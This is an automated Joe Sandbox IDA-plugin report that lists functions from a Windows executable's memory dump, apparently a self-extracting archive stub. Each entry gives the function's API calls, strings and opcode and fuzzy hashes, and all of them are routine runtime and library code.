Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
String ID: %s%s%u
API String ID: 689974011-1360425832
Opcode ID: 056d63489e2d6be1e29cc8a5dd819136653eccf765f3f2f7ab66d4fe1e425b19
Instruction ID: b97427f501bc9d1c71a50e680dd82eb57685684541d024aa3d6d9fc8382350ee
Opcode Fuzzy Hash: 056d63489e2d6be1e29cc8a5dd819136653eccf765f3f2f7ab66d4fe1e425b19
Instruction Fuzzy Hash: F5417371900658AADF27DB50CC45FEA77BCEB05346F4180A6FD09EB061EE709A48CF61

Function 00362900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00362937
___except_validate_context_record.LIBVCRUNTIME ref: 0036293F
_ValidateLocalCookies.LIBCMT ref: 003629C8
__IsNonwritableInCurrentImage.LIBCMT ref: 003629F3
_ValidateLocalCookies.LIBCMT ref: 00362A48

Strings

csm, xrefs: 003629DD

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 70c7ab95c5a1a66b3d5f9dc064226df3aa149ccbb46e301fe8216b6525b5b819
Instruction ID: 66af46516f1a8f853c8c415ec1dda38596cd6e944ed6771e0b610a09792fd955
Opcode Fuzzy Hash: 70c7ab95c5a1a66b3d5f9dc064226df3aa149ccbb46e301fe8216b6525b5b819
Instruction Fuzzy Hash: 0841C030A00608AFCF12DF68C885AAFBBF5AF45324F16C055E819AB396D7719A51CF91

Function 00359955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0035995E
_wcslen.LIBCMT ref: 00359993

Strings

<br>, xrefs: 003599DF
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00359987
 , xrefs: 00359A21
, xrefs: 003599B0

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: 16f87f1154cb92956800f36d7311248b9fa5f41a689df1f45a3066f8a1aca936
Instruction ID: d47a891a0756f91415cb3b74f478d97c3381aa3fcd8748530db4049812f398a7
Opcode Fuzzy Hash: 16f87f1154cb92956800f36d7311248b9fa5f41a689df1f45a3066f8a1aca936
Instruction Fuzzy Hash: 66317032644345D6D632AB549C42F7673A8EB90321F51C42FFC868B2A0FB55BD4883B1

Function 0036C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0036C868: _free.LIBCMT ref: 0036C891

_free.LIBCMT ref: 0036C8F2

Part of subcall function 00368DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0036C896,?,00000000,?,00000000,?,0036C8BD,?,00000007,?,?,0036CCBA,?), ref: 00368DE2
Part of subcall function 00368DCC: GetLastError.KERNEL32(?,?,0036C896,?,00000000,?,00000000,?,0036C8BD,?,00000007,?,?,0036CCBA,?,?), ref: 00368DF4

_free.LIBCMT ref: 0036C8FD
_free.LIBCMT ref: 0036C908
_free.LIBCMT ref: 0036C95C
_free.LIBCMT ref: 0036C967
_free.LIBCMT ref: 0036C972
_free.LIBCMT ref: 0036C97D

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: d727a1727f818fdb9af58c1920b6a5e3c85323a116e07b438192b459109e0e02
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: 5C118171590B08AAE632B7B2CC07FDB7BACAF06B00F408D16B2DD6F096DA74B5158750

Function 0035E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0035E669,0035E5CC,0035E86D), ref: 0035E605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0035E61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0035E630

Strings

KERNEL32.DLL, xrefs: 0035E600
AcquireSRWLockExclusive, xrefs: 0035E615
ReleaseSRWLockExclusive, xrefs: 0035E625

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 137becc1b9cf93a59693299ef710f7a5e246b9273af495e31dc1d55834fd878a
Instruction ID: 7ae3a94fdbf7022fc22e35b7fae6c03e3da3a0e3a23a87283db7b9e1ddb8a5bd
Opcode Fuzzy Hash: 137becc1b9cf93a59693299ef710f7a5e246b9273af495e31dc1d55834fd878a
Instruction Fuzzy Hash: 48F0C2357803725B0F3B4E649C84DA622CCAA267E3B02453ADD4AD3160EB54CF586B90

Function 00368900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0036891E

Part of subcall function 00368DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0036C896,?,00000000,?,00000000,?,0036C8BD,?,00000007,?,?,0036CCBA,?), ref: 00368DE2
Part of subcall function 00368DCC: GetLastError.KERNEL32(?,?,0036C896,?,00000000,?,00000000,?,0036C8BD,?,00000007,?,?,0036CCBA,?,?), ref: 00368DF4

_free.LIBCMT ref: 00368930
_free.LIBCMT ref: 00368943
_free.LIBCMT ref: 00368954
_free.LIBCMT ref: 00368965

Strings

p7, xrefs: 00368914

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: p7
API String ID: 776569668-2520287851
Opcode ID: 7f04c237d6a5167203d63e0fb6c78b25a2be8d3bd6415bf2ba829a2522317bcf
Instruction ID: 56a269994d1f9b1e76a2aee31d1ebf9c86496ccda4ed27342740a66ed3c2c9c2
Opcode Fuzzy Hash: 7f04c237d6a5167203d63e0fb6c78b25a2be8d3bd6415bf2ba829a2522317bcf
Instruction Fuzzy Hash: EDF05E758115228BC6976F2CFC024073FBDF72F714B014B46F8186A6B9CB754981DB91

Function 0035146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 003514C2

Part of subcall function 0034B146: GetVersionExW.KERNEL32(?), ref: 0034B16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003514E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 00351500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00351513
SystemTimeToFileTime.KERNEL32(?,?), ref: 00351523
SystemTimeToFileTime.KERNEL32(?,?), ref: 00351533

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: c0d39c83d27a325ecdac8d55517221fa167bde058881fa002ff0144dbe6d33a0
Instruction ID: de3c1e834aaff53e9bef31545983f421330bd8919a5b33ab08350cdbf7617e84
Opcode Fuzzy Hash: c0d39c83d27a325ecdac8d55517221fa167bde058881fa002ff0144dbe6d33a0
Instruction Fuzzy Hash: 5631F775108306ABC701DFA9C88499BB7FCBF98714F404A1EF999C3210E730D549CBA6

Function 00362AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00362AF1,003602FC,0035FA34), ref: 00362B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00362B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00362B2F
SetLastError.KERNEL32(00000000,00362AF1,003602FC,0035FA34), ref: 00362B81

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: fcfbe4e588350784f5e4b95af454413fe76dfa87316b00fbda8876edb3fd8f1c
Instruction ID: 54a65e0dce3d2be5a3015b9b550a52a11627e84ba1462d44d8b851ed0a8cb950
Opcode Fuzzy Hash: fcfbe4e588350784f5e4b95af454413fe76dfa87316b00fbda8876edb3fd8f1c
Instruction Fuzzy Hash: AC014732109B122EEA3B2FB47C8996B2B4CEF05779F228339F4146A0E8EF114C409204

Function 003697E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00381030,00364674,00381030,?,?,00363F73,00000050,?,00381030,00000200), ref: 003697E9
_free.LIBCMT ref: 0036981C
_free.LIBCMT ref: 00369844
SetLastError.KERNEL32(00000000,?,00381030,00000200), ref: 00369851
SetLastError.KERNEL32(00000000,?,00381030,00000200), ref: 0036985D
_abort.LIBCMT ref: 00369863

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 612e7cacb718b9d530865680f67376e23aa5d11659dadce8be3cc97885953787
Instruction ID: 525f9613ef501ee35be371f2ec854f0a4b06466b42763de2e82724b3d2ae9f09
Opcode Fuzzy Hash: 612e7cacb718b9d530865680f67376e23aa5d11659dadce8be3cc97885953787
Instruction Fuzzy Hash: 0AF02835100601A6C6633334BC0AB5B1A6D8FD7B30F22C135F629AB19BEE3188424575

Function 0035DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 0035DC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0035DC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0035DC72
TranslateMessage.USER32(?), ref: 0035DC7C
DispatchMessageW.USER32(?), ref: 0035DC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 0035DC91

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: ea69f565840b9ca4478a89e18af1ab264c363d318f93148ad1546f73e89efe3e
Instruction ID: 941f1da9be94124f00c56b77a47adef2c48f92d08f15f4378e63b63ebf53832f
Opcode Fuzzy Hash: ea69f565840b9ca4478a89e18af1ab264c363d318f93148ad1546f73e89efe3e
Instruction Fuzzy Hash: EBF03C72A01219BBCB32ABA5DC4CDDB7F7DEF42791F004111B90BD2060D674964ACBA0

Function 0035A80C Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 0035A699: GetDC.USER32(00000000), ref: 0035A69D
Part of subcall function 0035A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0035A6A8
Part of subcall function 0035A699: ReleaseDC.USER32(00000000,00000000), ref: 0035A6B3

GetObjectW.GDI32(?,00000018,?), ref: 0035A83C

Part of subcall function 0035AAC9: GetDC.USER32(00000000), ref: 0035AAD2
Part of subcall function 0035AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0035AB01
Part of subcall function 0035AAC9: ReleaseDC.USER32(00000000,?), ref: 0035AB99

Strings

(, xrefs: 0035A9AA
"5, xrefs: 0035A89D, 0035AAB9
A5, xrefs: 0035A9BA

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: "5$($A5
API String ID: 1061551593-177011439
Opcode ID: 25c975b213b49a01a504dadce5893e810accb99774a35944763b4584fde38a9f
Instruction ID: 02aafab4614d3f4b588622f6d5af51c88205c793dfb35ef2491485a8452e4c8b
Opcode Fuzzy Hash: 25c975b213b49a01a504dadce5893e810accb99774a35944763b4584fde38a9f
Instruction Fuzzy Hash: 7391EF71608754AFD622DF25C844E2BBBF8FF89701F00491EF99AD7220DB30A945DB62

Function 0034C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 003505DA: _wcslen.LIBCMT ref: 003505E0

Part of subcall function 0034B92D: _wcsrchr.LIBVCRUNTIME ref: 0034B944

_wcslen.LIBCMT ref: 0034C197
_wcslen.LIBCMT ref: 0034C1DF

Strings

.sfx, xrefs: 0034C11A
.exe, xrefs: 0034C10B
.rar, xrefs: 0034C0E1, 0034C134

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: 91f28ae56a49267bf58ecfd6da52590748b30c3de6af54c1ce380c2da178b86f
Instruction ID: 388526682f1a5ebc9bc9f48bbe0e46641bf88a641e93cd890a6d7d8848fed781
Opcode Fuzzy Hash: 91f28ae56a49267bf58ecfd6da52590748b30c3de6af54c1ce380c2da178b86f
Instruction Fuzzy Hash: 0C418B2252231196C777AF348842E7BB3E8EF41704F15690EF9C2AF091EB91BD85D391

Function 0034BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0034BB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0034A275,?,?,00000800,?,0034A23A,?,0034755C), ref: 0034BBC5
_wcslen.LIBCMT ref: 0034BC3B

Strings

\\?\, xrefs: 0034BB52, 0034BB99, 0034BBF7, 0034BC4E
UNC, xrefs: 0034BBA7

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: 8f6199cf54a5f4c5a0f6ffed29ed748a37ae7377956eaae0b9729a2431e348d3
Instruction ID: 9e7e4b27c7e723567484d07dd7742e70fae236a0070becd3e4c6c53105ab122e
Opcode Fuzzy Hash: 8f6199cf54a5f4c5a0f6ffed29ed748a37ae7377956eaae0b9729a2431e348d3
Instruction Fuzzy Hash: 1C41B331400215A6CF23AF24CCC1EEAB7EDEF41391F158465F954AF151EB71FE949A60

Function 0035CD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 0035CD84

Part of subcall function 0035AF98: _wcschr.LIBVCRUNTIME ref: 0035B033

Part of subcall function 00351FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0034C116,00000000,.exe,?,?,00000800,?,?,?,00358E3C), ref: 00351FD1

Strings

<, xrefs: 0035CD68
MAX, xrefs: 0035CDD9
HIDE, xrefs: 0035CDC6
MIN, xrefs: 0035CDF5

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: _wcschr$CompareString
String ID: <$HIDE$MAX$MIN
API String ID: 69343711-3358265660
Opcode ID: 80962dfc0385b4797de0911540187f00e54026da8391081b9602e2cd4a8e00b2
Instruction ID: f8fe78639049b8fada7253435e67f7b4823e6bfc4498ce66bbaccfcac3bf0bcd
Opcode Fuzzy Hash: 80962dfc0385b4797de0911540187f00e54026da8391081b9602e2cd4a8e00b2
Instruction Fuzzy Hash: EF3162759003099EDF36DB50CC41EEE73BCAB15356F018166ED05E7190EBB49A888FA1

Function 0035AAC9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0035AAD2
GetObjectW.GDI32(?,00000018,?), ref: 0035AB01
ReleaseDC.USER32(00000000,?), ref: 0035AB99

Strings

75, xrefs: 0035AB67
-5, xrefs: 0035AB32, 0035AB3F, 0035AB73, 0035AB7F

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ObjectRelease
String ID: -5$75
API String ID: 1429681911-149535788
Opcode ID: fb19c6b73bec6edba8a566090749a53de9ebbd34fafa75a5004b073d5ae105fc
Instruction ID: 4037c73d349c68fbdb6add4c94f3f3e3fcc0434a948cd18b9b3c27d689d0623b
Opcode Fuzzy Hash: fb19c6b73bec6edba8a566090749a53de9ebbd34fafa75a5004b073d5ae105fc
Instruction Fuzzy Hash: DE21FAB2148304AFD3029FA5DC48E6FBFEDFF8A351F044819FA4692120D7759A548B62

Function 0034B991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0034B9B8

Part of subcall function 00344092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003440A5

_wcschr.LIBVCRUNTIME ref: 0034B9D6
_wcschr.LIBVCRUNTIME ref: 0034B9E6

Strings

%c:\, xrefs: 0034B9AE

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: d527efda8700a4be8364176db923f040dbdf2c8ac8177cde453412316b2d3d2d
Instruction ID: 9ba37511a21c4d8405816aee30adc0a181a8d7c47d37e7619a37b45a85ea14f6
Opcode Fuzzy Hash: d527efda8700a4be8364176db923f040dbdf2c8ac8177cde453412316b2d3d2d
Instruction Fuzzy Hash: 0901F56360431269DA72AB358C82D6BE7ECEE92770B41881AF544DE082EB30E850C2B1

Function 0035B270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00341316: GetDlgItem.USER32(00000000,00003021), ref: 0034135A
Part of subcall function 00341316: SetWindowTextW.USER32(00000000,003735F4), ref: 00341370

EndDialog.USER32(?,00000001), ref: 0035B2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0035B2D6
